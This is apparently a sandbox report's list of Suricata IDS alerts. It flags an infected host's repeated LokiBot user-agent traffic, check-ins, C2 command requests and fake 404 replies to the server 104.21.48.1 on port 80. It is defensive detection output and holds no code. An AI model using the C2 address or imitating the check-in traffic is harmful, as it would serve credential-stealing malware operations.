            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49902 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49925 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49875 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49875 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49875 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49948 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49948 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49948 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49896 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49896 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49896 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49902 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49708
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49875 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49902 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49875 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49896 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49925 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49932 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49932 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49932 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49925 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49902 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49932 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49835
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49896 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49919
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49902 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49948 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49714
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49932 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49790
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49715 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49823 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49715 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49956 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49823 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49956 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49823 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49948 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49969 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49969 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49969 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49823 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49823 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49975 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49975 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49975 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49932
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49896
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49969 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49969 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49975 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49975 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49956 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49940 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49940 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49940 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49909 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49909 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49909 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49983 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49875
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49741 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49715
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49863 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49816 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49863 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49816 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49940 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49816 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49983 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49983 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49741 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49909 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49948
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49956 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49823
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49940 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49863 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49975
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49909 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49816 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49983 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49956 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49983 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50005 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50005 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50005 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49925
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50005 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50005 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50011 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50011 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50011 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49816 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49969
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49709
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49863 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49940
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49863 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50011 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50011 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49753 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49753 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49753 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49753 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49753 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49956
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50025 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49909
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50025 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50025 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50025 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50025 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50005
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49707
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50034 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50034 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50034 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50041 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50041 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50045 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50042 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50042 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49990 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50034 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49990 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50032 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50034 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50045 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50045 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50049 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50042 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50041 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49990 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50066 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50066 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50039 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50036 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49753
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49990 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49990 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50055 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50055 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50055 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50055 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50055 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50045 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50045 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49741
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50061 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50061 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50049 -> 104.21.48.1:80
